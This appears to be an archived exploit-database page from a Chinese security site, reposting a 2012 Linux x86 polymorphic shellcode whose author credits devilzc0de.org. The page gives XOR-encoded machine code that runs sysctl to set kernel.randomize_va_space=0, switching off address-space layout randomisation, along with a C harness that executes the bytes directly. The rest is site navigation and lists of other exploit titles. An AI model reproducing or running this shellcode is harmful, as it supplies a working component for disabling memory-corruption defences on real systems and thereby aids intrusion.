首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
linux/x86 sys_execve("/sbin/sysctl") 121 bytes polymorphic shellcode
来源:devilzc0de.org 作者:Paulus 发布时间:2012-02-09  
/* sys_execve("/sbin/sysctl", { "/sbin/sysctl", "-w", "kernel.randomize_va_space=0" }, NULL);
 * 121 bytes polymorphic shellcode
 * Programmer : Paulus Gandung Prakosa_ (syn-attack)
 * Thanks to : mywisdom, gunslinger_, nofia fitri, chaer.newbie, wenkhairu, ketek, xtr0nic,
 *             supermen ganteng, and all devilzc0de members
 */

/*
 * Tested in : 
 * - BackTrack 5 (linux-2.6.38-generic)
 * - Ubuntu 10.10 Maverick Meerkat (linux-2.6.38-generic)
 * - Ubuntu 11.04 Natty Narwhal
 * - Debian Squeeze 6.0.2 (linux-2.6.32-5-stable)
 * Note : Be sure to disabling ASLR (Address Space Layout Randomization) first before 
 *        placing and executing our shellcode
 */

#include <stdio.h>
#include <string.h>

char null_space[] = "\xeb\x0d\x5e\x31\xc9\xb1\x65\x80\x36\x7e"
		    "\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff"
		    "\x4f\xbe\xfd\x92\x7f\xf6\x7a\x5a\x16\x1d"
		    "\x1b\x43\x4e\x16\x21\x0d\x0e\x1f\x16\x1b"
		    "\x21\x08\x1f\x16\x11\x13\x17\x04\x16\x0c"
		    "\x1f\x10\x1a\x16\x10\x1b\x12\x50\x18\x16"
		    "\x1b\x0c\xfd\x92\x7f\xb8\x7a\x5a\x15\xf7"
		    "\x98\xfd\x92\x7f\xf6\x7a\x5a\x18\x16\x53"
		    "\x09\xfd\x92\x7f\xf6\x7a\x5a\x16\x0d\x1d"
		    "\x0a\x12\x16\x10\x51\x0d\x07\x16\x51\x0d"
		    "\x1c\x17\xf7\x9d\x2e\x28\x2d\xce\x75\xf7"
		    "\x9f\x4f\xac\xb3\xfe\x4f\xbe\xce\x7f\xb3"
		    "\xfe";

int main(void) {
  int null_len = strlen(null_space);
  printf("[+] Using key mutation engine : 0x7e\n");
  printf("[+] Length of this shellcode : %d bytes\n", null_len);
  printf("[+] After executing this code, please check the value of \"/proc/sys/kernel/randomize_va_space\"\n");
  (*(void(*)())null_space)();
  return 0;
}

/* devilzc0de.org, hacker-newbie.org, sdf.lonestar.org, 1337day.com */

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Quartzo InterApp Control 3.22
·TORCS <= 1.3.2 xml buffer over
·mozilla firefox <= 10.0 local
·Typsoft FTP Server 1.10 Multip
·SciTools Understand 2.6 DLL Lo
·Microsoft Internet Explorer 8
·PeerBlock 1.1 BSOD
·PDF Viewer Component ActiveX D
·Sysax Multi Server <= 5.52 Fil
·Edraw Diagram Component 5 Acti
·os-x/x86 bind backdoor tcp por
·PHP 5.4.0RC6 64bit Denial of S
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved